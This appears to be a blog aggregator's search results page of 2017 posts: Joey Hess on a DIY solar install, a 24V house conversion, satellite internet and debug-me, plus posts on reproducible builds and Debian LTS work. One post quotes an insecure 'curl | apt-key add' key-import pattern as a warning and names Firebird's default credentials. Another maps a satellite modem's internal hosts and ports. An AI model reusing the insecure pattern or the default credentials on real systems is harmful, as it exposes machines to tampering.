Search Results: "joeyh"

27 June 2017

Joey Hess: 12 to 24 volt house conversion

Upgrading my solar panels involved switching the house from 12 volts to 24 volts. No reasonably priced charge controllers can handle 1 KW of PV at 12 volts. There might not be a lot of people who need to do this; entirely 12 volt offgrid houses are not super common, and most upgrades these days probably involve rooftop microinverters and so would involve a switch from DC to AC. I did not find a lot of references online for converting a whole house's voltage from 12V to 24V. To prepare, I first checked that all the fuses and breakers were rated for > 24 volts. (Actually, > 30 volts because it will be 26 volts or so when charging.) Also, I checked for any shady wiring, and verified that all the wires I could see in the attic and wiring closet were reasonably sized (10AWG) and in good shape. Then I:
  1. Turned off every light, unplugged every plug, pulled every fuse and flipped every breaker.
  2. Rewired the battery bank from 12V to 24V.
  3. Connected the battery bank to the new charge controller.
  4. Engaged the main breaker, and waited for anything strange.
  5. Screwed in one fuse at a time.
lighting The house used all fluorescent lights, and they have ballasts rated for only 12V. While they work at 24V, they might blow out sooner or overheat. In fact one died this evening, and while it was flickering before, I suspect the 24V did it in. It makes sense to replace them with more efficient LED lights anyway. I found some 12-24V DC LED lights for regular screw-in (edison) light fixtures. Does not seem very common; Amazon only had a few models and they shipped from China. Also, I ordered a 15 foot long, 300 LED strip light, which runs on 24V DC and has an adhesive backing. Great stuff -- it can be cut to different lengths and stuck anywhere. I installed some underneath the cook stove hood and the kitchen cabinets, which didn't have lights before. Similar LED strips are used in some desktop lamps. My lamp was 12V only (barely lit at 24V), but I was able to replace its LED strip, upgrading it to 24V and three times as bright. (Christmas lights are another option; many LED christmas lights run on 24V.) appliances My Lenovo laptop's power supply that I use in the house is a vehicle DC-DC converter, and is rated for 12-24V. It seems to be running fine at 26V, did not get warm even when charging the laptop up from empty. I'm using buck converters to run various USB powered (5V) ARM boxes such as my sheevaplug. They're quarter sized, so fit anywhere, and are very efficient. My satellite internet receiver is running with a large buck converter, feeding 12V to an inverter, feeding to a 30V DC power supply. That triple conversion is inneficient, but it works for now. The ceiling fan runs on 24V, and does not seem to run much faster than on 12V. It may be rated for 12-24V. Can't seem to find any info about it. The radio is a 12V car radio. I used a LM317 to run it on 24V, to avoid the RF interference a buck converter would have produced. This is a very inneficient conversion; half of the power is wasted as heat. But since I can stream internet radio all day now via satellite, I'll not use the FM radio very often. Fridge... still running on propane for now, but I have an idea for a way to build a cold storage battery that will use excess power from the PV array, and keep a fridge at a constant 34 degrees F. Next home improvement project in the queue.

26 June 2017

Joey Hess: DIY solar upgrade complete-ish

Success! I received the Tracer4215BN charge controller where UPS accidentially-on-purpose delivered it to a neighbor, and got it connected up, and the battery bank rewired to 24V in a couple hours. charge controller reading 66.1V at 3.4 amps on panels, charging battery at 29.0V at 7.6A Here it's charging the batteries at 220 watts, and that picture was taken at 5 pm, when the light hits the panels at nearly a 90 degree angle. Compare with the old panels, where the maximum I ever recorded at high noon was 90 watts. I've made more power since 4:30 pm than I used to be able to make in a day! \o/

23 June 2017

Joey Hess: PV array is hot

Only took a couple hours to wire up and mount the combiner box. PV combiner box with breakers Something about larger wiring like this is enjoyable. So much less fiddly than what I'm used to. PV combiner box wiring And the new PV array is hot! multimeter reading 66.8 DVC Update: The panels have an open circuit voltage of 35.89 and are in strings of 2, so I'd expect to see 71.78 V with only my multimeter connected. So I'm losing 0.07 volts to wiring, which is less than I designed for.

21 June 2017

Joey Hess: DIY professional grade solar panel installation

I've installed 1 kilowatt of solar panels on my roof, using professional grade eqipment. The four panels are Astronergy 260 watt panels, and they're mounted on IronRidge XR100 rails. Did it all myself, without help. house with 4 solar panels on roof I had three goals for this install:
  1. Cheap but sturdy. Total cost will be under $2500. It would probably cost at least twice as much to get a professional install, and the pros might not even want to do such a small install.
  2. Learn the roof mount system. I want to be able to add more panels, remove panels when working on the roof, and understand everything.
  3. Make every day a sunny day. With my current solar panels, I get around 10x as much power on a sunny day as a cloudy day, and I have plenty of power on sunny days. So 10x the PV capacity should be a good amount of power all the time.
My main concerns were, would I be able to find the rafters when installing the rails, and would the 5x3 foot panels be too unweildly to get up on the roof by myself. I was able to find the rafters, without needing a stud finder, after I removed the roof's vent caps, which exposed the rafters. The shingles were on straight enough that I could follow the lines down and drilled into the rafter on the first try every time. And I got the rails on spaced well and straight, although I could have spaced the FlashFeet out better (oops). My drill ran out of juice half-way, and I had to hack it to recharge on solar power, but that's another story. Between the learning curve, a lot of careful measurement, not the greatest shoes for roofing, and waiting for recharging, it took two days to get the 8 FlashFeet installed and the rails mounted. Taking a break from that and swimming in the river, I realized I should have been wearing my water shoes on the roof all along. Super soft and nubbly, they make me feel like a gecko up there! After recovering from an (unrelated) achilles tendon strain, I got the panels installed today. Turns out they're not hard to handle on the roof by myself. Getting them up a ladder to the roof by yourself would normally be another story, but my house has a 2 foot step up from the back retaining wall to the roof, and even has a handy grip beam as you step up. roof next to the ground with a couple of cinderblock steps The last gotcha, which I luckily anticipated, is that panels will slide down off the rails before you can get them bolted down. This is where a second pair of hands would have been most useful. But, I macguyvered a solution, attaching temporary clamps before bringing a panel up, that stopped it sliding down while I was attaching it. clamp temporarily attached to side of panel I also finished the outside wiring today. Including the one hack of this install so far. Since the local hardware store didn't have a suitable conduit to bring the cables off the roof, I cobbled one together from pipe, with foam inserts to prevent chafing. some pipe with 5 wires running through it, attached to the side of the roof While I have 1 kilowatt of power on my roof now, I won't be able to use it until next week. After ordering the upgrade, I realized that my old PWM charge controller would be able to handle less than half the power, and to get even that I would have needed to mount the fuse box near the top of the roof and run down a large and expensive low-voltage high-amperage cable, around OO AWG size. Instead, I'll be upgrading to a MPPT controller, and running a single 150 volt cable to it. Then, since the MPPT controller can only handle 1 kilowatt when it's converting to 24 volts, not 12 volts, I'm gonna have to convert the entire house over from 12V DC to 24V DC, including changing all the light fixtures and rewiring the battery bank...

14 June 2017

Joey Hess: not tabletop solar

Borrowed a pickup truck today to fetch my new solar panels. This is 1 kilowatt of power on my picnic table. solar panels on picnic table

5 May 2017

Joey Hess: announcing debug-me

Today I'm excited to release debug-me, a program for secure remote debugging.
Debugging a problem over email/irc/BTS is slow, tedious, and hard. The developer needs to see your problem to understand it. Debug-me aims to make debugging fast, fun, and easy, by letting the developer access your computer remotely, so they can immediately see and interact with the problem. Making your problem their problem gets it fixed fast. debug-me session is logged and signed with the developer's GnuPG key, producing a chain of evidence of what they saw and what they did. So the developer's good reputation is leveraged to make debug-me secure.
I've recorded a short screencast demoing debug-me. And here's a screencast about debug-me's chain of evidence. The idea for debug-me came from Re: Debugging over email, and then my Patreon supporters picked debug-me in a poll as a project I should work on. It's been a fun month, designing the evidence chain, building a custom efficient protocol with space saving hacks, using websockets and protocol buffers and ed25519 for the first time, and messing around with low-level tty details. The details of debug-me's development are in my devblog. Anyway, I hope debug-me makes debugging less of a tedious back and forth, at least some of the time. PS: Since debug-me's protocol lets multiple people view the same shell session, and optionally interact with it, there could be uses for it beyond debugging, including live screencasting, pair programming, etc. PPS: There needs to be a debug-me server not run by me, so someone please run one..

27 April 2017

Joey Hess: Exede Surfbeam 2

My new satellite internet connection is from Exede, connecting to the ViaSat 1 bird in geosync orbit. A few technical details that I've observed follow. antagonistic by design The "Surfbeam 2 wifi modem" is a closed proprietary system. That is important because it's part of Exede's bandwidth management system. The Surfbeam tracks data use and sends it periodically to Exede. When a user has gone over their monthly priority data, Exede then throttles the bandwidth in various ways -- this throttling seems to be implemented, at least partially on the Surfbeam itself. (Perhaps by setting QoS flags?) So, if a user could hack their Surfbeam, they could probably bypass the bandwidth caps, or at least some of them. Perhaps Exede would notice eventually. Of course, doing so would surely violate the Exede TOS. If you're renting the modem, like I am, hacking a device you don't own might also subject you to criminal penalties. Needless to say, I don't plan to hack the SurfBeam. But it's been hacked before. So, this is a device that lives in people's homes and is antagonistic to them by design. weird data throttling The way the Surfbeam reports data use back to Exede periodically and gets throttling configured has some odd effects sometimes. For example, the Surfbeam can be in throttled state left-over from the previous billing month. When a new billing month begins, it can remain throttled for some time (up to multiple hours) until it sends an update to Exede and they un-throttle it. Data downloaded at that time might still be counted as priority data even though it was throttled. I've seen some good indications of that happening, but am not sure yet. But, I've decided that the throttling doesn't matter for me. Why? ViaSat 1 has many spot beams, and the working-class beam I'm in (most of it is in eastern Kentucky) does not seem to get a lot of use between 7 am and 4:30 pm weekdays. Even when throttled, I often get 300 kb/s - 1 mb/s speeds during the day, which is not a lot worse than the ~2.5 mb/s peak when unthrottled. And that's the time when I want to use broadband -- when the sun is shining and I'm at home at work/play. I'm probably going to switch to a cheaper plan with less priority data, because the priority data is not buying me much. This is a big change from the old FAP which rendered the satellite no faster than dialup. a whole network in there Looking at the ports open on the Surfbeam, some very strange things turned up. First, there are not one, not two, but three separate IPs used by the device, and there are at least two and perhaps three distinct computers involved. There are a lot of flickering LEDs inside the box; a whole network in there. 192.168.100.1 is the satellite controller. It's a Linux box, fingerprinted as kernel 3.10 or so (so full of security holes presumably), and it's running thttpd/2.25b (doesn't seem to have any known holes). It seems to have ssh and snmp, but with some port filtering that prevents access. (Note that the above exploit video confirms that snmp is running.) Some machine parsable data is exposed at http://192.168.100.1/index.cgi?page=modemStatusData and http://192.168.100.1/index.cgi?page=triaStatusData. (See (SurfStat program) 192.168.1.1 is the wifi router. It has a dns server, an icslap proxy, and nmap thinks it's Linux 3.x with Synology DiskStation Manager (probably the latter is a false positive?) It has its own separate web server for configuration, which is not thttpd. I'm fairly sure this is a separate processor from the other IP address. 192.168.100.2 responds to ICMP, but has no open ports at all. However, it seems to have filtered ssh, telnet, msrpc, microsoft-ds, and port 8090 (probably http), so perhaps it's running all that stuff. This one is definitely a separate processor, located in the Satellite dish's TRIA (transmit receive integrated assembly). Verified by disconnecting the dish's coax cable and being unable to ping it. lack of source code for GPLed software Exede did not provide anything to me about the GPL licensed source code on the Surfbeam 2. I'm not sure if they're legally required to do so in my case, since they're renting it to me? But, they do let you buy the device too, so it's interesting that nothing mentions the licenses of its software and where to get the source code. I'll try to buy it and ask for the source code eventually. power use The Surfbeam pulls as much power as two beefy laptops, but it is beaming signals thousands of miles into space, so I give it a bit of a pass. I want to find a way to power it from DC power, but have not had any success with that so far, so am wasting more power to run it on an inverter. Its power supply is rated at 30v and 2.5 amps. Interestingly, I've seen a photo of another Surfbeam power supply that only pulls 1.5 amps. This and a different case with fewer (external) LEDs makes me think perhaps the installer stuck me with an old and less efficient version. Maybe they integrated some of those processors into a single board in a new version and perhaps made it waste less power as heat. Mine gets pretty warm. I'm currently only able to run it approximately one hour per hour of sun collected by the house. Still on dialup the rest of the time. With the ability to get on broadband when dialup is being painful, being on dialup the rest of the time is perfectly ok. Of course it helps that with tools like git-annex, I'm very well tuned to popping up onto broadband briefly and making it count.

17 April 2017

Sylvain Beucler: Practical basics of reproducible builds 3

On my quest to generate reproducible standalone binaries for GNU FreeDink, I met new friends but currently lie defeated by an unexpected enemy... Episode 1: Episode 2:
First, the random build differences when using -Wl,--no-insert-timestamp were explained.
peanalysis shows random build dates:
$ reprotest 'i686-w64-mingw32.static-gcc hello.c -I /opt/mxe/usr/i686-w64-mingw32.static/include -I/opt/mxe/usr/i686-w64-mingw32.static/include/SDL2 -L/opt/mxe/usr/i686-w64-mingw32.static/lib -lmingw32 -Dmain=SDL_main -lSDL2main -lSDL2 -lSDL2main -Wl,--no-insert-timestamp -luser32 -lgdi32 -lwinmm -limm32 -lole32 -loleaut32 -lshell32 -lversion -o hello && chmod 700 hello && analysePE.py hello   tee /tmp/hello.log-$(date +%s); sleep 1' 'hello'
$ diff -au /tmp/hello.log-1*
--- /tmp/hello.log-1490950327   2017-03-31 10:52:07.788616930 +0200
+++ /tmp/hello.log-1523203509   2017-03-31 10:52:09.064633539 +0200
@@ -18,7 +18,7 @@
 found PE header (size: 20)
     machine: i386
     number of sections: 17
-    timedatestamp: -1198218512 (Tue Jan 12 05:31:28 1932)
+    timedatestamp: 632430928 (Tue Jan 16 09:15:28 1990)
     pointer to symbol table: 4593152 (0x461600)
     number of symbols: 11581 (0x2d3d)
     size of optional header: 224
@@ -47,7 +47,7 @@
     Win32VersionValue: 0
     size of image (memory): 4640768
     size of headers (offset to first section raw data): 1536
-    checksum (for drivers): 4927867
+    checksum (for drivers): 4922616
     subsystem: 3
         win32 console binary
     DllCharacteristics: 0
Stephen Kitt mentioned 2 simple patches (1 2) fixing uninitialized memory in binutils. These patches fix the variation and were submitted to MXE (pull request).
Next was playing with compiler support for SOURCE_DATE_EPOCH (which e.g. sets __DATE__ macros).
The FreeDink DFArc frontend historically displays a build date in the About box:
    "Build Date: %s\n", ..., __TDATE__
sadly support is only landing upstream in GCC 7 :/
I had to remove that date.
Now comes the challenging parts. All my tests with reprotest checked. I started writing a reproducible build environment based on Docker (git browse).
At first I could not run reprotest in the container, so I reworked it with SSH support, and reprotest validated determinism.
(I also generate a reproducible .zip archive, more on that later.) So far so good, but were the release identical when running reprotest successively on the different environments?
(reminder: this is a .exe build that is insensitive to varying path, hence consistent in a full reprotest)
$ sha256sum *.zip
189d0ca5240374896c6ecc6dfcca00905ae60797ab48abce2162fa36568e7cf1  freedink-109.0-bin-buildsh.zip
e182406b4f4d7c3a4d239eee126134ba5c0304bbaa4af3de15fd4f8bda5634a9  freedink-109.0-bin-docker.zip
e182406b4f4d7c3a4d239eee126134ba5c0304bbaa4af3de15fd4f8bda5634a9  freedink-109.0-bin-reprotest-docker.zip
37007f6ee043d9479d8c48ea0a861ae1d79fb234cd05920a25bb3db704828ece  freedink-109.0-bin-reprotest-null.zip
Ouch! Even though both the Docker and my host are running Stretch, there are differences.
For the two host builds (direct and reprotest), there is a subtle but simple difference: HOME.
HOME is invariably non-existant in reprotest, while my normal compilation environment has an existing home (duh!). This caused a subtle bug when cross-compiling with mingw and wine-binfmt:
  checking whether we are cross compiling... no
  checking whether we are cross compiling... yes
The respective binaries were very different notably due to a different config.h.
This can be fixed by specifying --build in addition to --host when calling ./configure. I suggested reprotest have one of the tests with a valid HOME (#860428).
Now comes the big one, after the fix I still got:
$ sha256sum *.zip
3545270ef6eaa997640cb62d66dc610a328ce0e7d412f24c8f18fdc7445907fd  freedink-109.0-bin-buildsh.zip
cc50ec1a38598d143650bdff66904438f0f5c1d3e2bea0219b749be2dcd2c3eb  freedink-109.0-bin-docker.zip
3545270ef6eaa997640cb62d66dc610a328ce0e7d412f24c8f18fdc7445907fd  freedink-109.0-bin-reprotest-chroot.zip
cc50ec1a38598d143650bdff66904438f0f5c1d3e2bea0219b749be2dcd2c3eb  freedink-109.0-bin-reprotest-docker.zip
3545270ef6eaa997640cb62d66dc610a328ce0e7d412f24c8f18fdc7445907fd  freedink-109.0-bin-reprotest-null.zip
There is consistency on my host, and consistency within docker, but both are different.
Moreover, all the .o files were identical, so something must have gone wrong when compiling the libs, that is MXE. After many checks it appears that libstdc++.a is different.
Just overwriting it gets me a consistent FreeDink release on all environments.
Still, when rebuilding it (make gcc), libstdc++.a always has the same environment-dependent checksum.
45f8c5d50a68aa9919ee3602a4e3f5b2bd0333bc8d781d7852b2b6121c8ba27b  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a  # host
6870b84f8e17aec4b5cf23cfe9c2e87e40d9cf59772a92707152361b6ebc1eb4  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a  # docker
The 2 libraries are much different, there's barely any blue in hexcompare. At that time, I realized that the Docker "official" Debian are not really official, as Joey explains.
Could it be that Docker maliciously tampered with the compiler as Ken Thompson warned in 1984?? Well before jumping to conclusion let's mix & match.
$ sudo env -i /usr/sbin/chroot chroot-docker/
$ exec bash -l
$ cd /opt/mxe
$ touch src/gcc.mk
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a 
6870b84f8e17aec4b5cf23cfe9c2e87e40d9cf59772a92707152361b6ebc1eb4  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
$ make gcc
[build]     gcc                    i686-w64-mingw32.static
[done]      gcc                    i686-w64-mingw32.static                                 2709464 KiB    7m2.039s
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a 
45f8c5d50a68aa9919ee3602a4e3f5b2bd0333bc8d781d7852b2b6121c8ba27b  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
# consistent with host builds
$ sudo tar -C chroot -c .   docker import - chroot-debootstrap
$ docker run -ti chroot-debootstrap /bin/bash
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
45f8c5d50a68aa9919ee3602a4e3f5b2bd0333bc8d781d7852b2b6121c8ba27b  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
$ touch src/gcc.mk
$ make gcc
[build]     gcc                    i686-w64-mingw32.static
[done]      gcc                    i686-w64-mingw32.static                                 2709412 KiB    7m6.608s
$ sha256sum /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
6870b84f8e17aec4b5cf23cfe9c2e87e40d9cf59772a92707152361b6ebc1eb4  /opt/mxe/usr/lib/gcc/i686-w64-mingw32.static/5.4.0/libstdc++.a
# consistent with docker builds
So, AFAICS when building with: then depending on whether running in a container or not we get a consistent but different libstdc++.a. This kind of issue is not detected with a simple reprotest build, as it only tests variations within a fixed build environment.
This is quite worrisome, I intend to use a container to control my build environment, but I can't guarantee that the container technology will be exactly the same 5 years from now. All my setup is simple and available for inspection at https://git.savannah.gnu.org/cgit/freedink.git/tree/autobuild/freedink-w32-snapshot/. I'd very much welcome enlightenment :)

11 April 2017

Joey Hess: starting debug-me and a new devblog

I've started building debug-me. It's my birthday, and building a new program is kind of my birthday gift to myself, because I love starting a new program and seeing where it goes. (Also, my Patreon backers wanted me to get on with building debug-me.) I also have a new devblog! Up until now, I've had a devblog that only covered work on git-annex. That one continues, but the new devblog is for development journaling for any project I'm working on. http://joeyh.name/devblog/

1 April 2017

Antoine Beaupr : My free software activities, February and March 2017

Looking into self-financing Before I begin, I should mention that I started tracking my time working on free software more systematically. I spend a lot of time on the computer, as regular readers of this blog might remember so I wanted to know exactly how much time was paid vs free work. I was already using org-mode's time clock system to keep track of my work hours, so I just extended this to my regular free software contributions, which also helps in writing those reports. It turns out that over 60% of my computer time is spent working on free software. That's huge! I was expecting something more along the range of 20 to 40% of my time. So I started thinking about ways of financing this work. I created a Patreon page but I'm hesitant into launching such a campaign: the only thing worse than "no patreon page" is "a patreon page with failed goals and no one financing it". So before starting such an effort, I'd like to get a feeling of what other people's experience with it are. I know that joeyh is close to achieving his goals, but I can't compare with the guy that invented git-annex or debhelper, so I'm concerned I wouldn't be able to raise the same level of funding. So any advice you have, feel free to contact me in private or in the comments. If you would be ready to fund my work, I'd love to know about it, obviously, but I guess I wouldn't get real numbers until I actually open up such a page... Now, onto the regular report.

Wallabako I spent a good chunk of time completing most of the things I had in mind for Wallabako, which I mentioned quickly in the previous report. Wallabako is now much easier to installed, with clearer instructions, an easier to use configuration file, more reliable synchronization and read status propagation. As usual the Wallabako README file has all the details. I've also looked at better integration with Koreader, the free software e-reader that forms the basis of the okreader free software distribution which has been able to port Debian to the Kobo e-readers, a project I am really excited about. This project has the potential of supporting Kobo readers beyond the lifetime that upstream grants it and removes a lot of proprietary software and spyware that ships with the Kobo readers. So I have made a few contributions to okreader and also on koreader, the ebook reader okreader is based on.

Stressant I rewrote stressant, my simple burn-in and stress-testing tool. After struggling in turn with Debirf, live-build, vmdebootstrap and even FAI, I just figured maybe it wasn't the best idea to try and reinvent that particular wheel: instead of reinventing how to build yet another Debian system build tool, maybe I should just reuse what's already there. It turns out there's a well known, succesful and fairly complete recovery system called Grml. It is a Debian Derivative, so all I needed to do was to stop procrastinating and actually write the actual stressant tool instead of just creating a distribution with a bunch of random tools shipped in. This allowed me to focus on which tools were the best to stress test different components. This selection ended up being: fio can also be used to overwrite disk drives with the proper options (--overwrite and --size=100%), although grml also ships with nwipe for wiping old spinning disks and hdparm to do a secure erase of SSD disks (whatever that's worth). Stressant still needs to be shipped with grml for this transition to be complete. In the meantime, I was able to configure the excellent public Gitlab CI service to provide ISO images with Stressant built-in as a stopgap measure. I also need to figure out a way to automate starting stressant from a boot menu to automate deployments on a larger scale, although because I have little need for the feature at this moment in time, this will likely wait for a sponsor to show up for this to be implemented. Still, stressant has useful features like the capability of sending logs by email using a fresh new implementation of the Python SMTPHandler (BufferedSMTPHandler) which waits for logging to complete before sending a single email. Another interesting piece of code in there is the NegateAction argparse handler that enables the use of "toggle flags" (e.g. --flag / --no-flag). I'm so happy with the code that I figure I could just share it here directly:
class NegateAction(argparse.Action):
    '''add a toggle flag to argparse

    this is similar to 'store_true' or 'store_false', but allows
    arguments prefixed with --no to disable the default. the default
    is set depending on the first argument - if it starts with the
    negative form (define by default as '--no'), the default is False,
    otherwise True.
    '''
    negative = '--no'
    def __init__(self, option_strings, *args, **kwargs):
        '''set default depending on the first argument'''
        default = not option_strings[0].startswith(self.negative)
        super(NegateAction, self).__init__(option_strings, *args,
                                           default=default, nargs=0, **kwargs)
    def __call__(self, parser, ns, values, option):
        '''set the truth value depending on whether
        it starts with the negative form'''
        setattr(ns, self.dest, not option.startswith(self.negative))
Short and sweet. I wonder why stuff like this is not in the standard library yet - maybe just because no one bothered yet? It'd be great to get feedback of more experienced Pythonistas on this one. I hope that my work on Stressant is complete. I get zero funding for this work, and have little use for it myself: I manage only a few machines and such a tool really shines when you regularly put new hardware online, which is (fortunately?) not my case anymore. I'd be happy, of course, to accompany organisations and people that wish to further develop and use such a tool. A short demo of stressant as well as detailed description of how it works is of course available in its README file.

Standard third party repositories After looking at improvements for the grml repository instructions, I realized there was no real "best practices" document on how to configure an Apt repository. Sure, there are tools like reprepro and others, but those hardly qualify as policy: they are very flexible and there are lots of ways to create insecure repositories or curl sh style instructions, which we of course generally want to avoid. While the larger problem of Unstrusted Debian packages remain generally unsolved (e.g. when you install any .deb file, it can get root on your system), it seemed to me one critical part of this problem was how to add a random third-party repository to your machine while limiting, as much as possible, what possible attackers could do with such a repository. In other words, to solve the more general problem of insecure .deb files, we also need to solve the distribution problem, otherwise fixing the .deb files themselves will be useless. This lead to the creation of standardized repository instructions that define:
  1. how to distribute the repository's public signing key (ie. over HTTPS)
  2. how to name suites and components (e.g. use stable and main unless you have a good reason, and explain yourself)
  3. recommend a healthy does of apt preferences pinning
  4. how to distribute keys (e.g. with a derive-archive-keyring package)
I've seen so many third party repositories get this wrong. For example, a lot of repositories recommend this type of command to intialize the OpenPGP trust path:
curl http://example.com/key.asc   apt-key add -
This has the following problems:
  • the key is transfered in plaintext and can easily be manipulated by an active attacker (e.g. a router on your path to the server or a neighbor in a Wifi cafe)
  • the key is added to the main trust root, which allows the key to authentify as the real Debian archive, therefore giving it all rights over all packages
  • since it's part of the global archive, it's difficult for a package to remove/add the key when a key rollover is necessary (and repositories generally don't provide a deriv-archive-keyring to do that process anyways)
An example of this are the Docker install instructions that, at least, manage to do this over HTTPS. Some other repositories don't even bother teaching people about the proper way of adding those keys. We settled for:
wget -O /usr/share/keyrings/deriv-archive-keyring.gpg https://deriv.example.net/debian/deriv-archive-keyring.gpg
That location was explicitly chosen to be out of the main trust directory, so that it needs to be explicitly added to the sources.list as well:
deb [signed-by=/usr/share/keyrings/deriv-archive-keyring.gpg] https://deriv.example.net/debian/ stable main
Similarly, we highly recommend users setup "apt pinning" to restrict what a given repository can do. Since pinning is so confusing, most people don't actually bother even configuring it and I have yet to see a single repo advise its users to configure those preferences, which are essential to limit what a repository can do. To keep configuration simple, we recommend this:
Package: *
Pin: origin deriv.example.net
Pin-Priority: 100
Obviously, for a single-package repository, the actual package name should be listed, e.g.:
Package: foo
Pin: origin deriv.example.net
Pin-Priority: 100
And the priority should probably be set to 1 unless you want to allow automatic upgrades. It is my hope that this design will get more traction in the years to come and become a de-facto standard that will be a key part in safely adding third party repositories. There is obviously much more work to be done to improve security when installing untrusted .deb files, and I encourage Debian developers to consider contributing to the UntrustedDebs discussions and particularly to the Teams/Dpkg/Spec/DeclarativePackaging work.

Signal R&D I spent a significant amount of time this month struggling with the Signal project on my phone. I'm still ambivalent on Signal: it's a centralized designed, too dependent on phone numbers, but I must admit they get a lot of things right and it's the only free-software platform that allows for easy-to-use, multi-platform videoconferencing that my family can use. I've been following Signal for a while: up until now, I had been using the LibreSignal rebuild of the official client, as it is distributed on a F-Droid repository. Because I try to avoid Google (proprietary) software on my phone, it's basically the only way I could even install Signal. Unfortunately, the repository is out of date and introduces another point of trust in the distribution model: now you not only need to trust the Signal authors to do the right thing, you also need to trust that F-Droid repo not to inject nasty code on your phone. I've therefore started a discussion about how Signal could be distributed outside of the Google Play Store. I'd like to think it's one of the things that led the Signal people to distribute an official copy of Signal outside of the playstore. After much struggling, I was able to upgrade to this official client and will be able to upgrade easily by just downloading the APK. (Do note that I ended up reinstalling and re-registering Signal, which unfortunately changed my secret keys.) I do hope Signal enters F-Droid one day, but it could take a while because it still doesn't work without Google services and barely works with MicroG, the free software alternative to the Google services clients. Moxie also set a list of requirements like crash reporting and statistics that need to be implemented on F-Droid's side before he agrees to the deployment, so this could take a while. I've also participated in the, ahem, discussion on the JWZ blog regarding a supposed vulnerability in Signal where it would leak previously unknown phone numbers to third parties. I reviewed the way the phone number is uploaded and, while it's possible to create a rainbow table of phone numbers (which are hashed with a truncated SHA-1 checksum), I couldn't verify the claims of other participants in the thread. For me, Signal still does the right thing with contacts, although I do question the way "read status" notifications get transmitted, but that belong in another bug report / blog post.

Debian Long Term Support (LTS) It's been more than a year working on Debian LTS, started by Raphael Hertzog at Freexian. I didn't work much in February so I had a lot of hours to catchup with, and was unfortunately unable to do so, partly because I was busy with other projects, and partly because my colleagues are doing a great job at resolving the most important issues. So one my concerns this month was finding work. It seemed that all the hard packages were either taken (e.g. my usual favorites, tiff and imagemagick, we done by others) or just too challenging (e.g. I don't feel quite comfortable tackling the LTS branch of the Linux kernel yet). I spent quite a bit of time trying to figure out what was wrong with pcre3, only to realise the "32" in the report was not about the architecture, but about the character width. Because of thise, I marked 4 CVEs (CVE-2017-7186, CVE-2017-7244, CVE-2017-7245, CVE-2017-7246) as "not-affected", since the 32-bith character support wasn't enabled in wheezy (or jessie, for that matter). I still spent some time trying to reproduce the issues, which require a compiler with an AddressSanitizer, something that was introduced in both Clang and GCC after Wheezy was released, which makes reproducing this fairly complicated... This allowed me to experiment more with Vagrant, however, and I have provided the Debian cloud team with a 32-bit Vagrant box that was merged in shortly after, although it doesn't show up yet in the official list of Debian images. Then I looked at the apparmor situation (CVE-2017-6507), Debian bug #858768). That was one tricky bug as well, since it's not a security issue in apparmor per se, but more an issue with things that assume a certain behavior from apparmor. I have concluded that Wheezy was not affected because there are no assumptions of proper isolation there - which are provided only starting from LXC 1.0 - and Docker is not in Wheezy. I also couldn't reproduce the issue on Jessie, but, as it turns out, the issue was sysvinit-specific, which is why I couldn't reproduce it under the default systemd configuration shipped with Jessie. I also looked at the various binutils security issues: as I reported on the mailing list, I didn't see anything serious enough in there to warrant a a security release and followed the lead of both the stable and Red Hat security teams by marking this "no-dsa". I similiarly reviewed the mp3splt security issues (specifically CVE-2017-5666) and was fairly puzzled by that issue, which seems to be triggered only the same address sanitization extensions than PCRE, although there was some pretty wild interplay with debugging flags in there. All in all, it seems we can't reproduce that issue in wheezy, but I do not feel confident enough in the results to push that issue aside for now. I finally uploaded the pending graphicsmagick issue (DLA-547-2), a regression update to fix a crash that was introduced in the previous release (DLA-547-1, mistakenly named DLA-574-1). Hopefully that release should clear up some of the confusion and fix the regression. I also released DLA-879-1 for the CVE-2017-6369 in firebird2.5 which was an interesting experiment: I couldn't reproduce the issue in a local VM. After following the Ubuntu setup tutorial, as I wasn't too familiar with the Firebird database until now (hint: the default username and password is sysdba/masterkey), I ended up assuming we were vulnerable and just backporting the patch after seeing the jessie folks push out a release just in case. I also looked at updating the ca-certificates package to deal with the pending WoSign/Startcom removal: I made an explicit list of the CAs that need to be removed after reviewing the Mozilla list. I also sent a patch for an unrelated issue where ca-certificates is writing to /usr/local (!!) in Debian bug #843722. I have also done some "meta" work in starting a discussion about fixing the missing DLA links in the tracker, as you will notice all of the above links lead to nowhere. Thanks to pabs, there are now some links but unfortunately there are about 500 DLAs missing from the website. We also discussed ways to Debian bug #859123, something which is currently a manual process. This is now in the hands of the excellent webmaster team. I have also filed a few missing security bugs (Debian bug #859135, Debian bug #859136), partly because I wanted to help the security team. But it turned out that I felt the script needed some improvements, so I submitted a patch to improve the script so it is easier to run.

Other projects As usual, there's the usual mixed bags of chaos: More stuff on Github...

16 March 2017

Joey Hess: end of an era

I'm at home downloading hundreds of megabytes of stuff. This is the first time I've been in position of "at home" + "reasonably fast internet" since I moved here in 2012. It's weird! Satellite internet dish with solar panels in foreground While I was renting here, I didn't mind dialup much. In a way it helps to focus the mind and build interesting stuff. But since I bought the house, the prospect of only dialup at home ongoing became more painful. While I hope to get on the fiber line that's only a few miles away eventually, I have not convinced that ISP to build out to me yet. Not enough neighbors. So, satellite internet for now. 9.1 dB SNR speedtest results: 15 megabit down / 4.5 up with significant variation Dish seems well aligned, speed varies a lot, but is easily hundreds of times faster than dialup. Latency is 2x dialup. The equipment uses more power than my laptop, so with the current solar panels, I anticipate using it only 6-9 months of the year. So I may be back to dialup most days come winter, until I get around to adding more PV capacity. It seems very cool that my house can capture sunlight and use it to beam signals 20 thousand miles into space. Who knows, perhaps there will even be running water one day. Satellite dish

8 March 2017

Antoine Beaupr : An update to GitHub's terms of service

